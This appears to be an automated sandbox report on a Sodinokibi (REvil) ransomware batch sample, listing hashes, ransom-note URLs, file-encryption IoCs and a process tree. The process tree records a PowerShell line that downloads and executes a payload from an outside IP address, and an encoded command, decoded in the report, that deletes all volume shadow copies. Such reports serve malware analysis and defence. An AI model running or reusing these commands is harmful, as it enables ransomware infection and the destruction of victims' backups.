Analysis

Max time kernel: 136s
Max time network: 154s
Platform: windows10_x64
Resource: win10v200722
Submitted: 19-08-2020 19:10

Static task: static1

Behavioral task: behavioral1
  Sample: 82d5933a7fe8497bb64008a8ad2bdaa6.bat
  Resource: win7v200722

Behavioral task: behavioral2
  Sample: 82d5933a7fe8497bb64008a8ad2bdaa6.bat
  Resource: win10v200722
General

Target: 82d5933a7fe8497bb64008a8ad2bdaa6.bat
Size: 220B
MD5: 613e281b75ac4b2fdf68a543bf8e3910
SHA1: 04cba786c3f966f0b61a930155de7ccfb85e5edb
SHA256: 697fd96092e104056ff21a7acab7b07da036f4e8d6cb9f672814b51be95591ed
SHA512: 389ba3e5b8d2188f3d1b6acb152607b567c815869ef0435e55e9eaa3ee93e31a692cc647369e21786c56bdd178bc6413f881abfcc2c8b5b38493891a86907dcb
Malware Config

Extracted from: http://185.103.242.78/pastes/82d5933a7fe8497bb64008a8ad2bdaa6

Extracted from: C:\ja1kdhk2-readme.txt
  Family: sodinokibi
  URLs (from the ransom note):
  - http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/60709E04D1E2CABE
  - http://decryptor.cc/60709E04D1E2CABE
Signatures

Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.

Blacklisted process makes network request (1 IoC)
  Processes: powershell.exe
  - flow 9, PID 504, powershell.exe

Modifies extensions of user files (5 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes: powershell.exe
  - File renamed: C:\Users\Admin\Pictures\UnpublishPush.tif => \??\c:\users\admin\pictures\UnpublishPush.tif.ja1kdhk2 (powershell.exe)
  - File renamed: C:\Users\Admin\Pictures\DisconnectFormat.raw => \??\c:\users\admin\pictures\DisconnectFormat.raw.ja1kdhk2 (powershell.exe)
  - File renamed: C:\Users\Admin\Pictures\MeasureDebug.raw => \??\c:\users\admin\pictures\MeasureDebug.raw.ja1kdhk2 (powershell.exe)
  - File renamed: C:\Users\Admin\Pictures\ShowFormat.crw => \??\c:\users\admin\pictures\ShowFormat.crw.ja1kdhk2 (powershell.exe)
  - File renamed: C:\Users\Admin\Pictures\UnlockResolve.raw => \??\c:\users\admin\pictures\UnlockResolve.raw.ja1kdhk2 (powershell.exe)

Enumerates connected drives (3 TTPs)

Modifies service (2 TTPs, 4 IoCs)
  Processes: vssvc.exe
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer (vssvc.exe)

Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Processes: powershell.exe
  - Set value (str): \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\qelnlq610812.bmp" (powershell.exe)

Drops file in Program Files directory (31 IoCs)
  Processes: powershell.exe
  - File opened for modification: \??\c:\program files\ExportConnect.3gp2 (powershell.exe)
  - File opened for modification: \??\c:\program files\RedoRepair.cfg (powershell.exe)
  - File opened for modification: \??\c:\program files\ResetEnter.xlt (powershell.exe)
  - File opened for modification: \??\c:\program files\SaveFind.js (powershell.exe)
  - File opened for modification: \??\c:\program files\SearchProtect.inf (powershell.exe)
  - File opened for modification: \??\c:\program files\CheckpointGroup.php (powershell.exe)
  - File opened for modification: \??\c:\program files\FindMount.dwg (powershell.exe)
  - File opened for modification: \??\c:\program files\PopEdit.tiff (powershell.exe)
  - File opened for modification: \??\c:\program files\SaveUnblock.ADTS (powershell.exe)
  - File opened for modification: \??\c:\program files\UnregisterUnblock.png (powershell.exe)
  - File opened for modification: \??\c:\program files\BlockShow.ppsm (powershell.exe)
  - File opened for modification: \??\c:\program files\JoinMount.dwfx (powershell.exe)
  - File opened for modification: \??\c:\program files\LimitExport.vdw (powershell.exe)
  - File opened for modification: \??\c:\program files\RegisterUninstall.DVR (powershell.exe)
  - File opened for modification: \??\c:\program files\RestoreGet.dotx (powershell.exe)
  - File opened for modification: \??\c:\program files\ReadPublish.vssm (powershell.exe)
  - File opened for modification: \??\c:\program files\DismountWatch.vbs (powershell.exe)
  - File opened for modification: \??\c:\program files\EnableComplete.kix (powershell.exe)
  - File opened for modification: \??\c:\program files\LimitDisable.pptx (powershell.exe)
  - File opened for modification: \??\c:\program files\OpenClose.otf (powershell.exe)
  - File opened for modification: \??\c:\program files\UpdateReceive.tif (powershell.exe)
  - File created: \??\c:\program files\ja1kdhk2-readme.txt (powershell.exe)
  - File opened for modification: \??\c:\program files\ClearUnlock.ttf (powershell.exe)
  - File opened for modification: \??\c:\program files\UninstallReceive.wps (powershell.exe)
  - File opened for modification: \??\c:\program files\UnprotectEnable.odp (powershell.exe)
  - File created: \??\c:\program files (x86)\ja1kdhk2-readme.txt (powershell.exe)
  - File opened for modification: \??\c:\program files\BackupStep.mp3 (powershell.exe)
  - File opened for modification: \??\c:\program files\LimitMerge.001 (powershell.exe)
  - File opened for modification: \??\c:\program files\ResetExport.rtf (powershell.exe)
  - File opened for modification: \??\c:\program files\UndoSkip.wax (powershell.exe)
  - File opened for modification: \??\c:\program files\UpdateUndo.js (powershell.exe)

Suspicious behavior: EnumeratesProcesses (8 IoCs)
  Processes: powershell.exe, powershell.exe
  - PID 504 powershell.exe (5 entries)
  - PID 1716 powershell.exe (3 entries)

Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes: powershell.exe, powershell.exe, vssvc.exe
  - Token: SeDebugPrivilege, PID 504 powershell.exe (2 entries)
  - Token: SeDebugPrivilege, PID 1716 powershell.exe
  - Token: SeBackupPrivilege, PID 3868 vssvc.exe
  - Token: SeRestorePrivilege, PID 3868 vssvc.exe
  - Token: SeAuditPrivilege, PID 3868 vssvc.exe
  - Token: SeTakeOwnershipPrivilege, PID 504 powershell.exe

Suspicious use of WriteProcessMemory (6 IoCs)
  Processes: cmd.exe, powershell.exe
  - PID 3288 cmd.exe wrote to memory of PID 504 powershell.exe (3 entries)
  - PID 504 powershell.exe wrote to memory of PID 1716 powershell.exe (3 entries)
Processes

C:\Windows\system32\cmd.exe (PID 3288, depth 1)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\82d5933a7fe8497bb64008a8ad2bdaa6.bat"
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 504, depth 2)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/82d5933a7fe8497bb64008a8ad2bdaa6');Invoke-LIEITOMPTWTBU;Start-Sleep -s 10000"
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1716, depth 3)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      The -e argument is a base64-encoded UTF-16LE string; it decodes to "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}", i.e. deletion of all volume shadow copies, which is consistent with the vssvc.exe activity recorded below.
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\vssvc.exe (PID 3868, depth 1)
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken